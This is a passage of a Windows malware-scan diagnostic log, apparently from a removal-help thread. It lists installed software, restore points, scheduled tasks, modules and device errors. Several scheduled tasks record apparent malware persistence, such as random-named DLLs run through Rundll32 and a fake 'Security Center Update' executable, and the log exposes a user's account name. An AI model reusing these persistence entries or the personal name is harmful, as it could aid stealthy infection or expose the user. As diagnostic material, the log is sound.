CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden

ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden

ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden

CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)

Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)

Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)

Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)

Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)

Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)

Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)

Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden

DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden

DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden

DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden

EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )

Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)

Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)

GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)

HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)

HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)

HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)

HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)

HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)

HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)

HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)

iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)

iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)

Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)

Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)

MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden

MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)

Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)

Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden

Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden

Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)

Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden

Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden

Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden

Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden

Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)

Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)

NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)

Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden

OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)

PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)

ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden

QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)

Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)

Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )

Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden

Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)

Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden

Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden

Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden

SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)

SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)

SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden

Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden

Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)

Skins (Version: 2007.0731.2234.38497 - ATI) Hidden

SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden

SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)

Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)

TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden

UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden

Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)

Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)

Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version:  - Microsoft)

Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version:  - Microsoft)

Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)

Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version:  - Microsoft)

Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)

Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)

Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)

WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden

 

==================== Custom CLSID (selected items): ==========================

 

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

 

 

==================== Restore Points  =========================

 

29-07-2014 11:25:23 Scheduled Checkpoint

30-07-2014 11:45:57 Scheduled Checkpoint

01-08-2014 21:10:36 Scheduled Checkpoint

02-08-2014 16:42:56 Scheduled Checkpoint

04-08-2014 04:00:03 Scheduled Checkpoint

07-08-2014 22:48:19 Scheduled Checkpoint

11-08-2014 02:11:41 Scheduled Checkpoint

11-08-2014 15:01:42 Scheduled Checkpoint

12-08-2014 10:45:08 Scheduled Checkpoint

14-08-2014 02:36:25 Scheduled Checkpoint

14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14  17:59

14-08-2014 23:31:34 Advanced-System Protector

15-08-2014 23:47:04 Removed SofTest

16-08-2014 13:18:06 Removed DriverUpdate

16-08-2014 13:29:10 Removed HTC Sync.

16-08-2014 13:44:46 Removed HTC Sync.

16-08-2014 14:02:17 Removed HTC BMP USB Driver.

16-08-2014 16:47:50 Advanced-System Protector

16-08-2014 21:58:06 Installed AVG 2014

16-08-2014 22:11:41 Removed SlimCleaner Plus

16-08-2014 22:14:50 Removed HTC Driver Installer.

17-08-2014 19:56:09 Installed AVG 2014

17-08-2014 19:59:04 Installed AVG 2014

17-08-2014 20:03:04 Removed AVG 2014

17-08-2014 20:04:51 Installed AVG 2011

17-08-2014 21:08:16 Installed AVG 2014

17-08-2014 21:16:20 Installed AVG 2014

17-08-2014 21:24:43 Removed AVG 2014

17-08-2014 21:26:10 Installed AVG 2011

19-08-2014 21:04:48 Advanced-System Protector

21-08-2014 01:40:12 Advanced-System Protector

23-08-2014 20:47:11 Checkpoint by HitmanPro

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

 

==================== Scheduled Tasks (whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

 

Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)

Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM

Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION

Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe

Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe

Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)

Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)

Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)

Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer

Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI

Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe

Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages

Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)

Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe

Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)

Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION

Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe

Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)

Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)

Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()

Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe

Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe

 

==================== Loaded Modules (whitelisted) =============

 

2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe

2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe

2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll

2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll

2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll

2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll

2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll

2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll

 

==================== Alternate Data Streams (whitelisted) =========

 

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

 

AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4

AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

 

==================== Safe Mode (whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== EXE Association (whitelisted) =============

 

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

 

 

==================== MSCONFIG/TASK MANAGER disabled items =========

 

(Currently there is no automatic fix for this section.)

 

 

==================== Faulty Device Manager Devices =============

 

Name: Microsoft 6to4 Adapter #2

Description: Microsoft 6to4 Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Microsoft

Service: tunnel

Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)

Resolution: Update the driver

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet 1022n

Description: HP LaserJet 1022n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6940 series

Description: Deskjet 6940 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: hp LaserJet 2420

Description: hp LaserJet 2420

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet CP1025nw

Description: HP LaserJet CP1025nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet 200 color M251nw

Description: HP LaserJet 200 color M251nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\INDEX> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_3> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

